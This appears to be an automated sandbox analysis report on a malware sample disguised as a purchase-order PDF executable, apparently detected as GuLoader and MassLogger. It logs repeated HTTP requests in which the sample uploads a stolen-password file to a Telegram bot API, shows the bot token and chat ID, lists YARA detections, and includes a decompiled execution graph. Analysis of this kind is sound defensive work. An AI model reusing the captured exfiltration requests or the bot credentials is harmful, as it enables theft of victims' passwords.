                                                                                                          2024-12-17 02:30:48 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13520,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402648,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.449885149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:51 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd20cb4a9bb649
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 02:30:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 63 62 34 61 39 62 62 36 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd20cb4a9bb649Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:51 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:51 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:51 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13521,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402651,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.449898149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:55 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd21359d38fd7b
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-17 02:30:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 33 35 39 64 33 38 66 64 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd21359d38fd7bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:30:56 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:30:56 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:30:56 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13522,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402656,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.449907149.154.167.2204437716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 02:30:59 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd21a2e32dbc29
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-17 02:30:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 61 32 65 33 32 64 62 63 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd21a2e32dbc29Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-17 02:31:00 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Tue, 17 Dec 2024 02:31:00 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 542
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-17 02:31:00 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":13523,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402660,"document":{"file_n


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:21:28:55
                                                                                                          Start date:16/12/2024
                                                                                                          Path:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:491'585 bytes
                                                                                                          MD5 hash:95611E69A35EAFC00725B14ABCC7CC1A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2006375263.0000000005405000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:21:29:28
                                                                                                          Start date:16/12/2024
                                                                                                          Path:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:491'585 bytes
                                                                                                          MD5 hash:95611E69A35EAFC00725B14ABCC7CC1A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2918352521.0000000003F75000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:21.5%
                                                                                                            Dynamic/Decrypted Code Coverage:13.9%
                                                                                                            Signature Coverage:20.7%
                                                                                                            Total number of Nodes:1516
                                                                                                            Total number of Limit Nodes:45
                                                                                                            execution_graph 4778 402840 4779 402bbf 18 API calls 4778->4779 4781 40284e 4779->4781 4780 402864 4783 405c05 2 API calls 4780->4783 4781->4780 4782 402bbf 18 API calls 4781->4782 4782->4780 4784 40286a 4783->4784 4806 405c2a GetFileAttributesW CreateFileW 4784->4806 4786 402877 4787 402883 GlobalAlloc 4786->4787 4788 40291a 4786->4788 4791 402911 CloseHandle 4787->4791 4792 40289c 4787->4792 4789 402922 DeleteFileW 4788->4789 4790 402935 4788->4790 4789->4790 4791->4788 4807 403258 SetFilePointer 4792->4807 4794 4028a2 4795 403242 ReadFile 4794->4795 4796 4028ab GlobalAlloc 4795->4796 4797 4028bb 4796->4797 4798 4028ef 4796->4798 4799 403027 32 API calls 4797->4799 4800 405cdc WriteFile 4798->4800 4801 4028c8 4799->4801 4802 4028fb GlobalFree 4800->4802 4804 4028e6 GlobalFree 4801->4804 4803 403027 32 API calls 4802->4803 4805 40290e 4803->4805 4804->4798 4805->4791 4806->4786 4807->4794 4808 10001000 4811 1000101b 4808->4811 4818 10001516 4811->4818 4813 10001020 4814 10001024 4813->4814 4815 10001027 GlobalAlloc 4813->4815 4816 1000153d 3 API calls 4814->4816 4815->4814 4817 10001019 4816->4817 4820 1000151c 4818->4820 4819 10001522 4819->4813 4820->4819 4821 1000152e GlobalFree 4820->4821 4821->4813 4822 401cc0 4823 402ba2 18 API calls 4822->4823 4824 401cc7 4823->4824 4825 402ba2 18 API calls 4824->4825 4826 401ccf GetDlgItem 4825->4826 4827 402531 4826->4827 4828 4029c0 4829 402ba2 18 API calls 4828->4829 4830 4029c6 4829->4830 4831 4029f9 4830->4831 4833 40281e 4830->4833 4834 4029d4 4830->4834 4832 406077 18 API calls 4831->4832 4831->4833 4832->4833 4834->4833 4836 405f9c wsprintfW 4834->4836 4836->4833 4199 403c41 4200 403d94 4199->4200 4201 403c59 4199->4201 4203 403de5 4200->4203 4204 403da5 GetDlgItem GetDlgItem 4200->4204 4201->4200 4202 403c65 4201->4202 4206 403c70 SetWindowPos 4202->4206 4207 403c83 4202->4207 4205 403e3f 4203->4205 4213 401389 2 API calls 4203->4213 4208 404119 19 API calls 4204->4208 4209 404165 SendMessageW 4205->4209 4230 403d8f 4205->4230 4206->4207 4210 403ca0 4207->4210 4211 403c88 ShowWindow 4207->4211 4212 403dcf SetClassLongW 4208->4212 4242 403e51 4209->4242 4214 403cc2 4210->4214 4215 403ca8 DestroyWindow 4210->4215 4211->4210 4216 40140b 2 API calls 4212->4216 4217 403e17 4213->4217 4219 403cc7 SetWindowLongW 4214->4219 4220 403cd8 4214->4220 4218 4040c3 4215->4218 4216->4203 4217->4205 4223 403e1b SendMessageW 4217->4223 4229 4040d3 ShowWindow 4218->4229 4218->4230 4219->4230 4221 403d81 4220->4221 4222 403ce4 GetDlgItem 4220->4222 4279 404180 4221->4279 4226 403d14 4222->4226 4227 403cf7 SendMessageW IsWindowEnabled 4222->4227 4223->4230 4224 40140b 2 API calls 4224->4242 4225 4040a4 DestroyWindow EndDialog 4225->4218 4232 403d21 4226->4232 4233 403d68 SendMessageW 4226->4233 4234 403d34 4226->4234 4244 403d19 4226->4244 4227->4226 4227->4230 4229->4230 4231 406077 18 API calls 4231->4242 4232->4233 4232->4244 4233->4221 4237 403d51 4234->4237 4238 403d3c 4234->4238 4236 403d4f 4236->4221 4240 40140b 2 API calls 4237->4240 4241 40140b 2 API calls 4238->4241 4239 404119 19 API calls 4239->4242 4243 403d58 4240->4243 4241->4244 4242->4224 4242->4225 4242->4230 4242->4231 4242->4239 4260 403fe4 DestroyWindow 4242->4260 4270 404119 4242->4270 4243->4221 4243->4244 4276 4040f2 4244->4276 4246 403ecc GetDlgItem 4247 403ee1 4246->4247 4248 403ee9 ShowWindow KiUserCallbackDispatcher 4246->4248 4247->4248 4273 40413b EnableWindow 4248->4273 4250 403f13 EnableWindow 4253 403f27 4250->4253 4251 403f2c GetSystemMenu EnableMenuItem SendMessageW 4252 403f5c SendMessageW 4251->4252 4251->4253 4252->4253 4253->4251 4274 40414e SendMessageW 4253->4274 4275 406055 lstrcpynW 4253->4275 4256 403f8a lstrlenW 4257 406077 18 API calls 4256->4257 4258 403fa0 SetWindowTextW 4257->4258 4259 401389 2 API calls 4258->4259 4259->4242 4260->4218 4261 403ffe CreateDialogParamW 4260->4261 4261->4218 4262 404031 4261->4262 4263 404119 19 API calls 4262->4263 4264 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4263->4264 4265 401389 2 API calls 4264->4265 4266 404082 4265->4266 4266->4230 4267 40408a ShowWindow 4266->4267 4268 404165 SendMessageW 4267->4268 4269 4040a2 4268->4269 4269->4218 4271 406077 18 API calls 4270->4271 4272 404124 SetDlgItemTextW 4271->4272 4272->4246 4273->4250 4274->4253 4275->4256 4277 4040f9 4276->4277 4278 4040ff SendMessageW 4276->4278 4277->4278 4278->4236 4280 404198 GetWindowLongW 4279->4280 4290 404221 4279->4290 4281 4041a9 4280->4281 4280->4290 4282 4041b8 GetSysColor 4281->4282 4283 4041bb 4281->4283 4282->4283 4284 4041c1 SetTextColor 4283->4284 4285 4041cb SetBkMode 4283->4285 4284->4285 4286 4041e3 GetSysColor 4285->4286 4287 4041e9 4285->4287 4286->4287 4288 4041f0 SetBkColor 4287->4288 4289 4041fa 4287->4289 4288->4289 4289->4290 4291 404214 CreateBrushIndirect 4289->4291 4292 40420d DeleteObject 4289->4292 4290->4230 4291->4290 4292->4291 4293 401fc3 4294 401fd5 4293->4294 4304 402087 4293->4304 4316 402bbf 4294->4316 4296 401423 25 API calls 4302 4021e1 4296->4302 4298 402bbf 18 API calls 4299 401fe5 4298->4299 4300 401ffb LoadLibraryExW 4299->4300 4301 401fed GetModuleHandleW 4299->4301 4303 40200c 4300->4303 4300->4304 4301->4300 4301->4303 4322 40649a WideCharToMultiByte 4303->4322 4304->4296 4307 402056 4311 4051b4 25 API calls 4307->4311 4308 40201d 4309 402025 4308->4309 4310 40203c 4308->4310 4367 401423 4309->4367 4325 10001759 4310->4325 4313 40202d 4311->4313 4313->4302 4314 402079 FreeLibrary 4313->4314 4314->4302 4317 402bcb 4316->4317 4318 406077 18 API calls 4317->4318 4319 402bec 4318->4319 4320 401fdc 4319->4320 4321 4062e9 5 API calls 4319->4321 4320->4298 4321->4320 4323 4064c4 GetProcAddress 4322->4323 4324 402017 4322->4324 4323->4324 4324->4307 4324->4308 4326 10001789 4325->4326 4370 10001b18 4326->4370 4328 10001790 4329 100018a6 4328->4329 4330 100017a1 4328->4330 4331 100017a8 4328->4331 4329->4313 4419 10002286 4330->4419 4402 100022d0 4331->4402 4336 1000180c 4342 10001812 4336->4342 4343 1000184e 4336->4343 4337 100017ee 4432 100024a9 4337->4432 4338 100017d7 4352 100017cd 4338->4352 4429 10002b5f 4338->4429 4339 100017be 4341 100017c4 4339->4341 4346 100017cf 4339->4346 4341->4352 4413 100028a4 4341->4413 4348 100015b4 3 API calls 4342->4348 4344 100024a9 10 API calls 4343->4344 4350 10001840 4344->4350 4345 100017f4 4443 100015b4 4345->4443 4423 10002645 4346->4423 4354 10001828 4348->4354 4358 10001895 4350->4358 4454 1000246c 4350->4454 4352->4336 4352->4337 4357 100024a9 10 API calls 4354->4357 4356 100017d5 4356->4352 4357->4350 4358->4329 4362 1000189f GlobalFree 4358->4362 4362->4329 4364 10001881 4364->4358 4458 1000153d wsprintfW 4364->4458 4365 1000187a FreeLibrary 4365->4364 4368 4051b4 25 API calls 4367->4368 4369 401431 4368->4369 4369->4313 4461 1000121b GlobalAlloc 4370->4461 4372 10001b3c 4462 1000121b GlobalAlloc 4372->4462 4374 10001d7a GlobalFree GlobalFree GlobalFree 4375 10001d97 4374->4375 4392 10001de1 4374->4392 4376 100020ee 4375->4376 4385 10001dac 4375->4385 4375->4392 4378 10002110 GetModuleHandleW 4376->4378 4376->4392 4377 10001c1d GlobalAlloc 4395 10001b47 4377->4395 4380 10002121 LoadLibraryW 4378->4380 4381 10002136 4378->4381 4379 10001c86 GlobalFree 4379->4395 4380->4381 4380->4392 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4381->4469 4382 10001c68 lstrcpyW 4383 10001c72 lstrcpyW 4382->4383 4383->4395 4385->4392 4465 1000122c 4385->4465 4386 10002188 4388 10002195 lstrlenW 4386->4388 4386->4392 4387 10002048 4387->4392 4396 10002090 lstrcpyW 4387->4396 4470 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4388->4470 4392->4328 4393 10002148 4393->4386 4401 10002172 GetProcAddress 4393->4401 4394 100021af 4394->4392 4395->4374 4395->4377 4395->4379 4395->4382 4395->4383 4395->4387 4395->4392 4397 10001cc4 4395->4397 4398 10001f37 GlobalFree 4395->4398 4400 1000122c 2 API calls 4395->4400 4468 1000121b GlobalAlloc 4395->4468 4396->4392 4397->4395 4463 1000158f GlobalSize GlobalAlloc 4397->4463 4398->4395 4400->4395 4401->4386 4410 100022e8 4402->4410 4404 10002415 GlobalFree 4408 100017ae 4404->4408 4404->4410 4405 100023d3 lstrlenW 4405->4404 4409 100023d1 4405->4409 4406 100023ba GlobalAlloc 4406->4409 4407 1000238f GlobalAlloc WideCharToMultiByte 4407->4404 4408->4338 4408->4339 4408->4352 4409->4404 4476 100025d9 4409->4476 4410->4404 4410->4405 4410->4406 4410->4407 4411 1000122c GlobalAlloc lstrcpynW 4410->4411 4472 100012ba 4410->4472 4411->4410 4415 100028b6 4413->4415 4414 1000295b VirtualAlloc 4416 10002979 4414->4416 4415->4414 4417 10002a75 4416->4417 4418 10002a6a GetLastError 4416->4418 4417->4352 4418->4417 4420 10002296 4419->4420 4421 100017a7 4419->4421 4420->4421 4422 100022a8 GlobalAlloc 4420->4422 4421->4331 4422->4420 4427 10002661 4423->4427 4424 100026b2 GlobalAlloc 4428 100026d4 4424->4428 4425 100026c5 4426 100026ca GlobalSize 4425->4426 4425->4428 4426->4428 4427->4424 4427->4425 4428->4356 4430 10002b6a 4429->4430 4431 10002baa GlobalFree 4430->4431 4479 1000121b GlobalAlloc 4432->4479 4434 10002530 StringFromGUID2 4440 100024b3 4434->4440 4435 10002541 lstrcpynW 4435->4440 4436 1000250b MultiByteToWideChar 4436->4440 4437 10002571 GlobalFree 4437->4440 4438 10002554 wsprintfW 4438->4440 4439 100025ac GlobalFree 4439->4345 4440->4434 4440->4435 4440->4436 4440->4437 4440->4438 4440->4439 4441 10001272 2 API calls 4440->4441 4480 100012e1 4440->4480 4441->4440 4484 1000121b GlobalAlloc 4443->4484 4445 100015ba 4446 100015c7 lstrcpyW 4445->4446 4448 100015e1 4445->4448 4449 100015fb 4446->4449 4448->4449 4450 100015e6 wsprintfW 4448->4450 4451 10001272 4449->4451 4450->4449 4452 100012b5 GlobalFree 4451->4452 4453 1000127b GlobalAlloc lstrcpynW 4451->4453 4452->4350 4453->4452 4455 1000247a 4454->4455 4456 10001861 4454->4456 4455->4456 4457 10002496 GlobalFree 4455->4457 4456->4364 4456->4365 4457->4455 4459 10001272 2 API calls 4458->4459 4460 1000155e 4459->4460 4460->4358 4461->4372 4462->4395 4464 100015ad 4463->4464 4464->4397 4471 1000121b GlobalAlloc 4465->4471 4467 1000123b lstrcpynW 4467->4392 4468->4395 4469->4393 4470->4394 4471->4467 4473 100012c1 4472->4473 4474 1000122c 2 API calls 4473->4474 4475 100012df 4474->4475 4475->4410 4477 100025e7 VirtualAlloc 4476->4477 4478 1000263d 4476->4478 4477->4478 4478->4409 4479->4440 4481 100012ea 4480->4481 4482 1000130c 4480->4482 4481->4482 4483 100012f0 lstrcpyW 4481->4483 4482->4440 4483->4482 4484->4445 4837 4016c4 4838 402bbf 18 API calls 4837->4838 4839 4016ca GetFullPathNameW 4838->4839 4840 4016e4 4839->4840 4841 401706 4839->4841 4840->4841 4844 406398 2 API calls 4840->4844 4842 40171b GetShortPathNameW 4841->4842 4843 402a4c 4841->4843 4842->4843 4845 4016f6 4844->4845 4845->4841 4847 406055 lstrcpynW 4845->4847 4847->4841 4848 4014cb 4849 4051b4 25 API calls 4848->4849 4850 4014d2 4849->4850 4851 40194e 4852 402bbf 18 API calls 4851->4852 4853 401955 lstrlenW 4852->4853 4854 402531 4853->4854 4855 4027ce 4856 4027d6 4855->4856 4857 4027da FindNextFileW 4856->4857 4860 4027ec 4856->4860 4858 402833 4857->4858 4857->4860 4861 406055 lstrcpynW 4858->4861 4861->4860 4681 401754 4682 402bbf 18 API calls 4681->4682 4683 40175b 4682->4683 4684 405c59 2 API calls 4683->4684 4685 401762 4684->4685 4686 405c59 2 API calls 4685->4686 4686->4685 4862 401d56 GetDC GetDeviceCaps 4863 402ba2 18 API calls 4862->4863 4864 401d74 MulDiv ReleaseDC 4863->4864 4865 402ba2 18 API calls 4864->4865 4866 401d93 4865->4866 4867 406077 18 API calls 4866->4867 4868 401dcc CreateFontIndirectW 4867->4868 4869 402531 